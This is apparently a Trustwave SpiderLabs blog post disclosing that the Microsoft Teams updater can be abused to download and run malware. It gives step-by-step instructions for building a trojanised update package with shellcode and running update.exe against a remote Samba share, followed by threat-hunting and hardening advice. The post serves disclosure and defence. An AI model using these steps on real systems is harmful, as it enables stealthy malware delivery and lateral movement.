Loading...
Blogs & Stories

SpiderLabs Blog

Attracting more than a half-million annual readers, this is the security community's go-to destination for technical breakdowns of the latest threats, critical vulnerability disclosures and cutting-edge research.

Microsoft Teams Updater Living off the Land

Introduction

During this global pandemic COVID-19 situation, there has been an increasing trend of video conferencing solutions, Trustwave SpiderLabs are exercising extra vigilance in monitoring the video conferencing traffics. During our threat hunt, we have observed lots of Microsoft Teams updater traffic. Due to the noisy nature of the traffic, there is a possibility that malicious traffic hiding there will evade the analyst's view or even be added to a list of allowed, and therefore unmonitored, list of applications.

Because of this, I reviewed the previous findings on Microsoft Team code execution and found that it was fixed but not completely.

Observations

My original finding allowed a malicious actor to use the MS Teams Updater to download any binary or payload they wish. This technique is typically known as Living Off the Land and is especially dangerous, as it uses known, common software to download malware.

The patch previously provided for Teams was to restrict its ability to update via a URL. Instead, the updater allows local connections via a share or local folder for product updates.

Initially, when I observed this finding, I figured it could still be used as a technique for lateral movement, however, I found the limitations added could be easily bypassed by pointing to a remote SMB share.

Legitimate Events:

%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacated>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update

Current Patch

As per the patch, Microsoft Teams Updater will allow only local network paths to access and update, that means it will detect the string "http/s", ":", "/" and port numbers in the updater URL, blocks and log the activity under %localappdata%\Microsoft\Teams\SquirrelSetup.log

Patch

 

It allows share access in the local UNC format: \\server\

To exploit this an attacker would need to:

  1. Get the file inside the network in an open shared folders
  2. Access the payload from that share to the victim machine

It looks like a complicated scenario and there’s a long road to travel, but we can make it work.

Remote Samba

To reduce the attack steps, an attacker can create a remote rather than local share. This would allow them to download the remote payload and execute rather than trying to get the payload to a local share as an intermediary step.

I did some research on Samba and configured a Samba server for remote, public access. After a successful setup, I initiated the command execution, downloaded remote payload, and executed directly from Microsoft Teams Updater "Update.exe"

Command: Update.exe --update=\\remoteserver\payloadFolder

Vulnerable Endpoint

%localappdata%/Microsoft/Teams/update.exe

Offensive Part

To exploit this, a payload that supports the updater framework must be crafted first

Payload creation:

  1. Extract any nupkg package, in my example, Teams-1.3.00.27559-full.nupkg
    1. goto %localappdata%/Microsoft/Teams/packages to pick Microsoft Teams pre-built package
  2. Go to Teams-1.3.00.27559-full\lib\net45 and drop your shellcode as 'squirrel.exe' compress the complete folder as 'Teams-1.3.00.27559-full.nupkg'
  3. Calculate the metadata with the command:
    sha1sum Teams-1.3.00.27559-full.nupkg && wc -c < Teams-1.3.00.27559-full.nupkg

    resulting with the output:
    fa8b87f0b995498a6e890c832dcaf968997608d4 Teams-1.3.00.27559-full.nupkg 4695

  4. Create a file named RELEASES and copy the above output and save.
  5. The result will be a main directory containing two files: Teams-1.3.00.27559-full.nupkg and RELEASES.
  6. upload those two files to remote Samba server:

            Payload

Requirement:

Since it is a Samba server, the server needs to be first authenticated from windows "Run".

Steps to Reproduce:

  1. Go to target application folder "%localappdata%/Microsoft/Teams/" on the victim system
  2. Run the below command:
    update.exe --update=[Samba server contains the above 2 files]
    e.g. update.exe --update=\\remoteserver\payloadFolder

After some seconds (wait for 10-15 seconds), the payload will be downloaded successfully and executed by Microsoft Teams

Affected parameters:

update.exe --update=\\remoteserver\payloadFolder
update.exe --updateRollback=\\remoteserver\payloadFolder

Exploitation Flow:

Process_flow

Proof of concept:

Impact:

  • Microsoft Teams Update.exe binary would act as LOLbin (Living off the Land binaries)
  • Since the installation is in the local user Appdata folder, no privileged access is needed
  • Attackers can use this to masquerade the traffic (especially for lateral movement)

Trustwave did reach out to Microsoft on this issue and they responded saying:

“Thank you again for submitting this issue to Microsoft. We determined that this behavior is considered to be by design as "we cannot restrict SMB source for –update because we have customers that apparently rely on this (e.g. folder redirection)."

Trustwave Recommendations

From the Threat hunting perspective

  1. Utilize the EDR solutions and look at "update.exe" command lines for suspicious connections
  2. Hunt for squirrel.exe executables and investigate the size of the file, you can use that to differentiate trojan squirrels from the legit squirrel.exe
    • If you are dealing with Microsoft Teams “update.exe”, Validate the size and hash, hunt for any anomalies
  3. Investigate outgoing SMB connections especially from the Microsoft Teams updater update.exe or filter SMB connections entirely at the perimeter if unnecessary
  4. Request customer or IT for any security exclusions placed for Microsoft Teams packages and review the change applied
  5. IT should install the Microsoft Teams under the "Program Files" folder, so an attacker cannot drop and execute the remote payload; this can be carried out by Group policy
  6. Disable any kind of update mechanisms and set a policy that updates should be pushed only by the IT team

Trustwave is exercising extra vigilance in monitoring this kind of traffic. We regularly monitor and improve our threat hunting plans for all global cyber events and all organizations can undertake similar operations within their environment. Contact Trustwave about engaging professional threat hunting.

Recent SpiderLabs Blog Posts